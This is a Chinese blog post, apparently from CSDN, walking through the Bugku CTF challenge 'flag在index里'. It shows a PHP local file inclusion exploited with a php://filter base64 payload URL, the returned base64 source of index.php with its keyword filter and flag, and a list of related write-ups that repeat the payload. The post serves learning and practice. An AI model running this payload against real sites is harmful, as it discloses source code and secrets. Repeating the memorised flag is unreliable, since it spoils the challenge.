flag在index里

最新推荐文章于 2020-10-17 14:30:51 发布
最新推荐文章于 2020-10-17 14:30:51 发布
阅读量543 收藏 1
点赞数
分类专栏: 网络安全web 文章标签: ctf bugku

flag在index里

题目要求:
文件包含

在这里插入图片描述

查看源代码,发现file=show.php,可能就是文件包含

并不知道大佬们如何得到源码的,我只是用他们的博客看看怎么做,关键就在于那个PHP过滤封装协议
由于是刚刚入门的小白,还不是很明白这种操作,继续研究了一下,官方文档链接如下

http://www.php.net/manual/zh/wrappers.php.php

这里摘抄一些跟本文有关的重点段落,下面是对于元封装器的介绍和应用
在这里插入图片描述

解题思路
首先这是一个file关键字的get参数传递,php://是一种协议名称,php://filter/是一种访问本地文件的协议,/read=convert.base64-encode/表示读取的方式是base64编码后,resource=index.php表示目标文件为index.php。

通过传递这个参数可以得到index.php的源码,下面说说为什么,看到源码中的include函数,这个表示从外部引入php文件并执行,如果执行不成功,就返回文件的源码。

而include的内容是由用户控制的,所以通过我们传递的file参数,是include()函数引入了index.php的base64编码格式,因为是base64编码格式,所以执行不成功,返回源码,所以我们得到了源码的base64格式,解码即可。

如果不进行base64编码传入,就会直接执行,而flag的信息在注释中,是得不到的。
payload

http://123.206.87.240:8005/post/?file=php://filter/read=convert.base64-encode/resource=index.php

得到的base64码:

PGh0bWw+DQogICAgPHRpdGxlPkJ1Z2t1LWN0ZjwvdGl0bGU+DQogICAgDQo8P3BocA0KCWVycm9yX3JlcG9ydGluZygwKTsNCglpZighJF9HRVRbZmlsZV0pe2VjaG8gJzxhIGhyZWY9Ii4vaW5kZXgucGhwP2ZpbGU9c2hvdy5waHAiPmNsaWNrIG1lPyBubzwvYT4nO30NCgkkZmlsZT0kX0dFVFsnZmlsZSddOw0KCWlmKHN0cnN0cigkZmlsZSwiLi4vIil8fHN0cmlzdHIoJGZpbGUsICJ0cCIpfHxzdHJpc3RyKCRmaWxlLCJpbnB1dCIpfHxzdHJpc3RyKCRmaWxlLCJkYXRhIikpew0KCQllY2hvICJPaCBubyEiOw0KCQlleGl0KCk7DQoJfQ0KCWluY2x1ZGUoJGZpbGUpOyANCi8vZmxhZzpmbGFne2VkdWxjbmlfZWxpZl9sYWNvbF9zaV9zaWh0fQ0KPz4NCjwvaHRtbD4NCg==

解码得到index.php的源码:
在这里插入图片描述
转自1
转自2

舞动的獾
关注
专栏目录
CTF/CTF练习平台-flagindex【php://filter的利用】
benli8541的博客
02-08 2346
原题内容: http://120.24.86.145:8005/post/ Mark一下这道题,前前后后弄了两个多小时,翻了一下别的博主的wp感觉还是讲的太粗了,这总结下自己的理解: 首先打开这道题,页面只给你click me? no 点击进去显示test5 第一步,查看源代码,无果 第二步bp,无果 结合到题目,flagindex,大胆尝试http://120.24.86.145:8005/post/index.php,可惜和之前一样 注意到了传值为http://1...
bugkuCTF---flagindex
Glad you came
03-15 1475
题目来源:https://ctf.bugku.com/challenges 点击click me?no 之后url变成了这样 出现了 file=show.php,说明可能有文件包含漏洞, 所以构建url: http://123.206.87.240:8005/post/index.php?file=php://filter/read=convert.base64-encode/resour...
Bugku——flagindex
王嘟嘟的博客
11-03 1072
0x00 前言 今日份CTF奉上,这到底涉及到的伪协议是真的不懂呀。 题目 0x01 start 我一直都相信就算有什么东西不会,但是请把你能做好的每一点都做好,比如说xxxx这个东西你根本不会,你首先要做的就是把xxxx这个名字的意思查清楚,虽然很蠢,但是也是一中态度。 点开链接进行查看 点一下click me进行尝试。 发现这很明显的提示file=xxxx 知道是文件包含,但是怎么利用...
Bugku——flagindex
weixin_30832405的博客
10-25 107
题目链接:http://123.206.87.240:8005/post/ 我们直接打开题目: click me? no? 我们还是点进去看看能发现什么。 在这我们发现一个php伪协议 file:file的功能是访问本地文件系统,我们试试看看能读到什么信息。 结合题目提示falg在index面 构造payload:?file=php://filter/read=c...
Bugku Web CTF-flagIndex
No Title
12-09 966
Bugku Web CTF-flagIndex 查看网页源码。 <html> <title>Bugku-ctf</title> <a href="./index.php?file=show.php">click me? no</a></html> 观察URL的格式,让人联想到文件包含漏洞。然而并没有看到...
flagindex,php://filter协议
wssmiss的博客
03-06 757
题目连接http://123.206.87.240:8005/post/ 题目 点击之后出现 地址栏:http://123.206.87.240:8005/post/index.php?file=show.php 观察此题的切入点应该在文件包含漏洞,而且是php ...
Bugku:flagindex
foreverzwl
10-22 1775
php文件包含漏洞
bugku---flagindex
LuckySec
11-15 450
题目 http://123.206.87.240:8005/post/ 点击试试 可以看到file=show.php 由此想到php://filter是PHP中独有的协议 这是关于php://filter的博客 https://www.leavesongs.com/PENETRATION/php-filter-magic.html 将网址改为 http://123.206.87.240:80...
Bugku-CTF之flagindex
weixin_34130269的博客
04-21 237
Day15 flagindex http://123.206.87.240:8005/post/ 本题要点:php://filter 点击发现: 我们点击后发现网址变成了http://123.206.87.240:8005/post/index.php?file=show.php 这我们看到了file关键字 于是我们就想到了php...
Bugku–flagindex(本地文件包含)writeup
xuchen16的博客
09-19 2516
flagindex 80 http://120.24.86.145:8005/post/   解题思路: 首先打开这道题,页面只给你click me? no 点击进去显示test5     第一步,查看源代码,无果 第二步bp,无果 结合到题目,flagindex,大胆尝试http://120.24.86.145:8005/post/index.php,可惜和之前一样...
BugkuCTF–flagindex(附加文件包含漏洞整理)
qq_39585393的博客
10-17 1140
题目描述 解题思路 flagindex面,查看一下源码,发现没有什么有用的东西。然后点击了click me 那个链接 只蹦出来一个test5 也是没有什么东西。 一度陷入僵局,后来查阅才知道,题目的解题点在url后缀的file面。是ctf套路,典型的文件包含漏洞。 文件包含漏原理 文件包含漏洞的产生原因是在通过 PHP 的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。 php 中引发文件包含漏洞的通常是以下四个函数: 1、
flagindex(详解)——Bugku
weixin_34128534的博客
07-16 970
刚刚做了bugku的题目,现在整理一下 写出解题思路,希望能够帮助到那些需要帮助的人 所有的wp都是以一题一篇的形式写出 主要是为了能够让读者更好的阅读以及查找, 希望你们不要责怪!!共勉!!! Challenge 1152 Solves flagindex 80 http://120.24.86.145:8005/post/ ...
bugku-web-flagindex
a3uRa的一个窝
08-22 387
最近好忙啊 不说了,开始题目吧 进入页面 click me?no 点击 发现url变成了 http://120.24.86.145:8005/post/index.php?file=show.php flagindex面 尝试?file=index.php 不行没有任何返回 尝试 ?file=php://filter/convert.base64-encode...
bugku_web flagindex
didid_w的博客
05-01 600
打开网页:点击之后url变成了:看到?file=show.php在结合题目 flagindex 很容易想到文件包含试试:http://120.24.86.145:8005/post/index.php?file=file_get_contents(index.php)在试了其他的文件读取函数发现什么都没输出,说明可能有过滤条件得绕过过滤通过php伪协议利用PHP://filter/read=c...
BugKu flagindex-知识点
布屿
05-17 353
CTF/CTF练习平台-flagindex【php://filter的利用】 https://blog.csdn.net/wy_97/article/details/77431111 谈一谈php://filter的妙用 https://blog.csdn.net/wy_97/article/details/77432002 ...
Flag.soft_index = 0;
最新发布
03-31
As an AI language model, I do not have enough context to determine what programming language or environment this code is intended for. However, based on the syntax, it appears to be setting the value of a variable named "soft_index" to 0 in some program or script.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值